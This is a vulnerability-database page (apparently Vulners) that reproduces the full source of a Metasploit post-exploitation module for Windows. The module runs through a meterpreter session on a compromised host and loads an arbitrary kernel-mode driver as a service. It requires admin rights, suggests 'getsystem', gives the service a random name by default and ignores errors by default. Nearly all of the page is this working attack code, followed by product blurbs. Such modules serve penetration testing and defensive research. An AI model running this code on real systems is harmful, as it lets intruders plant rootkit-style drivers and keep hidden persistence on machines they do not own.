Lucene search
K

Windows Manage Driver Loader

🗓️ 13 Dec 2013 23:07:04Reported by Borja Merino <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 33 Views

This module loads a KMD (Kernel Mode Driver) using the Windows Service API

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Error

  START_TYPE = {
    'demand' => 'SERVICE_DEMAND_START',
    'boot' => 'SERVICE_BOOT_START',
    'auto' => 'SERVICE_AUTO_START',
    'disabled' => 'SERVICE_DISABLED',
    'system' => 'SERVICE_SYSTEM_START'
  }

  ERROR_TYPE = {
    'critical' => 'SERVICE_ERROR_CRITICAL',
    'normal' => 'SERVICE_ERROR_NORMAL',
    'severe' => 'SERVICE_ERROR_SEVERE',
    'ignore' => 'SERVICE_ERROR_IGNORE'
  }

  SERVICE_TYPE = {
    'kernel' => 'SERVICE_KERNEL_DRIVER',
    'file_system' => 'SERVICE_FILE_SYSTEM_DRIVER',
    'adapter' => 'SERVICE_ADAPTER',
    'recognizer' => 'SERVICE_RECOGNIZER_DRIVER'
  }

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Driver Loader',
        'Description' => %q{
          This module loads a KMD (Kernel Mode Driver) using the Windows Service API.
        },
        'License' => MSF_LICENSE,
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptString.new('DRIVER_PATH', [true, 'Driver path in %SYSTEMROOT%. Example: c:\\windows\\system32\\msf.sys']),
        OptString.new('DRIVER_NAME', [false, 'Driver Name.']),
        OptEnum.new('START_TYPE', [true, 'Start type.', 'auto', [ 'boot', 'system', 'auto', 'demand', 'disabled']]),
        OptEnum.new('SERVICE_TYPE', [true, 'Service type.', 'kernel', [ 'kernel', 'file_system', 'adapter', 'recognizer']]),
        OptEnum.new('ERROR_TYPE', [true, 'Error type.', 'ignore', [ 'ignore', 'normal', 'severe', 'critical']])
      ]
    )
  end

  def run
    driver = datastore['DRIVER_PATH']
    start = START_TYPE[datastore['START_TYPE']]
    error = ERROR_TYPE[datastore['ERROR_TYPE']]
    service = SERVICE_TYPE[datastore['SERVICE_TYPE']]

    name = datastore['DRIVER_NAME'].blank? ? Rex::Text.rand_text_alpha((rand(6..13))) : datastore['DRIVER_NAME']

    unless is_admin?
      print_error("Administrator or better privileges needed. Try 'getsystem' first.")
      return
    end

    unless driver =~ Regexp.new(Regexp.escape(expand_path('%SYSTEMROOT%')), Regexp::IGNORECASE)
      print_error('The driver must be inside %SYSTEMROOT%.')
      return
    end

    unless file_exist?(driver)
      print_error("Driver #{driver} does not exist.")
      return
    end

    inst = install_driver(name, path: driver, starttype: start, error_control: error, service_type: service)

    if inst == Windows::Error::SUCCESS
      ss = service_start(name)
      case ss
      when Windows::Error::SUCCESS
        print_good('Driver loaded successfully.')
      when Windows::Error::SERVICE_ALREADY_RUNNING
        print_error('Service already started.')
      when Windows::Error::SERVICE_DISABLED
        print_error('Service disabled.')
      else
        print_error('There was an error starting the service.')
      end
    end
  end

  def install_driver(name, opts = {})
    rc = service_create(name, opts)

    if rc == Windows::Error::SUCCESS
      print_status("Service object \"#{name}\" added to the Service Control Manager database.")
      return true
    elsif rc == Windows::Error::SERVICE_EXISTS
      print_error('The specified service already exists.')
      # Show ImagePath just to know if the service corresponds to the desired driver.
      service = service_info(name)
      print_error("Path of driver file in \"#{name}\" service: #{service[:path]}.")
    else
      print_error("There was an error opening the driver handler. GetLastError=#{rc}.")
    end
    return false
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation